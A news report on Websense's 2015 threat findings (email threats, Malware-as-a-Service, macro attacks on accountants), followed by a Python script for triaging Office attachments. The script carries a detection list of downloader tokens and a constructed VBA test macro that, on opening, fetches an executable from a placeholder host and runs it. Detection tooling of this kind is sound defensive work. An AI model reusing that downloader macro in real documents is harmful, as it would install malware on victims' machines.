An official of an IT security vendor admits the industry still isn’t doing a good enough job of countering the attacks organizations face.
“I think a lot of them have failed by overpromising what their products can do,” Bob Hansmann, director of product security at Websense Inc., said as the company released its 2015 Threat Report, which, like other vendors’ annual reports, shows more bad news.
He added that “a lot of companies are spending so much more on marketing than they are on development. There’s quite a few vendors in our industry — young startups, many of them — whose product hasn’t advanced all that much, but their marketing is fantastic.”
The Websense report also comes a day after more details leaked out about one of the most damaging attacks against the U.S. government: CNN says the data that suspected Russian hackers accessed last year on the unclassified White House network included President Obama’s daily schedule.
Hansmann also didn’t let organizations off the hook, complaining many IT teams are so focused on identifying malware they haven’t re-evaluated their email defences.
That matters when, as Websense has found, the overall volume of threats was down five per cent but email threats were up 25 per cent.
“One of the biggest weaknesses out there is email security,” he said, “where very few vendors have been doing investment, and customers have been happy with the status quo. And we (the security industry) have to take some blame for this because we’ve been telling them ‘Hey, don’t worry about email because everything’s got links in it.’” So security vendors have been focusing on Web threats instead.
“We did such a good job (IT) people are ignoring email, so the bad guys are going after that uncared for channel.”
Hansmann was responding to questions about why breaches continue to rise when organizations shell out billions of dollars a year on IT security products. Websense found that “cyber threat actors around the globe grew to staggering proportions in 2014.”
Perhaps the most alarming trend, the report added, was that three percent of malicious file samples showed a unique combination of attributes not common across other malicious file groups. This presents a ‘Zero-day’ risk to sandboxing defenses that may not recognize the behaviors in their new, unique sequence and contexts, the report says. “The key takeaway here is that sandboxing has its limitations and must be augmented with other detection methods for a higher probability of detection.”
There are good and bad IT teams, Hansmann added, just as there are good and bad vendors. “In the end all a business or government agency can do is make sure they’ve got the right teams with the right background and are properly funded to go and do their due diligence and (for boards) stop asking them to buy the latest thing they read in a magazine.”
In its report, which analyses anonymized customer data from Websense appliances, the company concluded that the number of hackers is growing because of their ability to rent and assemble attack packages rather than build them.
It’s an era of Malware-as-a-Service that has lowered the barriers to entry. Almost all malicious files examined used a command and control URL for botnets that had been previously used by one or more other malware samples, the report notes.
Exploit kits are one example of that market: the report puts their average rental price at $800 to $1,500 a month, depending on the features and add-ons.
“In spite of law enforcement, national Computer Emergency Response Teams (CERTs), security vendors and the security community as a whole collecting and disseminating Indicators of Compromise (IOC), the weaponization of malicious tools continues,” the report says. “We expect the level of sophistication that we observe in the threat landscape to continue to rise.”
While new ways of penetrating defences are being found, old ways are being recycled. For example, macro viruses are on the rise. Websense identified over three million macro-embedded email attachments in just the last 30 days of 2014.
As other IT vendors have reported, hackers are narrowing their attacks to specific people in organizations. For example, Websense notes one attack targeted fewer than 100 accountants in financial services, using a blend of techniques that took advantage of their daily reliance on macros within documents and spreadsheets.
They received a tailored email with an attached Microsoft Word document. A macro contacted a website to download an executable that opened a backdoor into the user’s PC.
Just to be sure, a second campaign was sent to those accountants the next day, with things like the sender and subject changed.
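The macro attack chain above (a Word attachment whose macro fetches an executable and launches it) and the earlier observation that almost every sample reuses a command-and-control URL seen in other malware together suggest a cheap mail-gateway check: flag attachments that carry a VBA project, look inside it for download-and-execute tokens, and match any URLs against previously seen C&C addresses. The script below is an added example written for this article, not code from Websense or from the report; the `.docm`-shaped zip, the VBA text and the `KNOWN_C2` list are all constructed here and the `example.invalid` URL is a placeholder. One caveat a practitioner should know: in a real `vbaProject.bin` the module source is stored MS-OVBA compressed inside an OLE container, so the raw string scan here is a heuristic, and production triage should decompress the streams first (oletools’ `olevba` does this); the presence check for `vbaProject.bin` itself is reliable.

```python
"""Triage Office (OOXML) attachments for embedded macros, downloader tokens and
known command-and-control URLs.  Added example, not Websense's code; every input
below is constructed so the script runs offline."""
import io
import re
import zipfile

# Strings a download-and-run macro usually needs.  Matching them in the raw VBA
# container is a heuristic: real module streams are MS-OVBA compressed, so a
# production check decompresses them (e.g. with oletools' olevba) before scanning.
SUSPICIOUS_TOKENS = (
    b"URLDownloadToFile", b"MSXML2.XMLHTTP", b"ADODB.Stream",
    b"Shell(", b"WScript.Shell", b"AutoOpen", b"Document_Open",
)
URL_RE = re.compile(rb"https?://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+")

# Hypothetical "previously seen" C&C URL list, constructed for this example.
KNOWN_C2 = {b"http://example.invalid/update/upd.exe"}


def triage_attachment(data: bytes, known_c2=KNOWN_C2) -> dict:
    """Inspect one attachment; return what was found and a coarse verdict."""
    result = {"has_macro": False, "tokens": [], "urls": [], "known_c2": [],
              "verdict": "clean"}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        result["verdict"] = "not-ooxml"   # not a zip-based Office file at all
        return result
    with zf:
        # An OOXML document carries its macros in a vbaProject.bin part.
        vba_parts = [n for n in zf.namelist() if n.lower().endswith("vbaproject.bin")]
        if not vba_parts:
            return result
        result["has_macro"] = True
        blob = b"".join(zf.read(n) for n in vba_parts)
    result["tokens"] = [t.decode() for t in SUSPICIOUS_TOKENS if t in blob]
    urls = sorted(set(URL_RE.findall(blob)))
    result["urls"] = [u.decode() for u in urls]
    # C&C reuse across samples is what makes a plain IOC match worthwhile.
    result["known_c2"] = [u.decode() for u in urls if u in known_c2]
    if result["known_c2"]:
        result["verdict"] = "malicious"
    elif result["tokens"] and result["urls"]:
        result["verdict"] = "suspicious"   # downloader shape, URL not yet known
    else:
        result["verdict"] = "macro-review"  # macro present, nothing obvious
    return result


def build_sample_docm(vba_blob) -> bytes:
    """Build a minimal .docm-shaped zip (constructed test input, not a real document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        if vba_blob is not None:
            zf.writestr("word/vbaProject.bin", vba_blob)
    return buf.getvalue()


# Constructed macro text with the shape described in the article: fetch a
# binary on open, then run it.  Stored uncompressed here so the scan can see it.
DOWNLOADER_VBA = (
    b"Sub AutoOpen()\r\n"
    b"  Dim r: r = URLDownloadToFile(0, \"http://example.invalid/update/upd.exe\", "
    b"Environ(\"TEMP\") & \"\\upd.exe\", 0, 0)\r\n"
    b"  Shell(Environ(\"TEMP\") & \"\\upd.exe\", 0)\r\n"
    b"End Sub\r\n"
)

if __name__ == "__main__":
    for label, doc in (("downloader", build_sample_docm(DOWNLOADER_VBA)),
                       ("no-macro", build_sample_docm(None))):
        print(label, triage_attachment(doc))
```

Run stand-alone, the constructed downloader document is reported as `malicious` because its URL is on the known-C&C list, and the same document scored against an empty list drops to `suspicious`, which is the case a sandbox or analyst queue should receive; the point of the second campaign sent to the accountants the next day is that the sender and subject change while the macro behaviour and often the C&C address do not, so keying detection on the attachment contents rather than the envelope survives the resend.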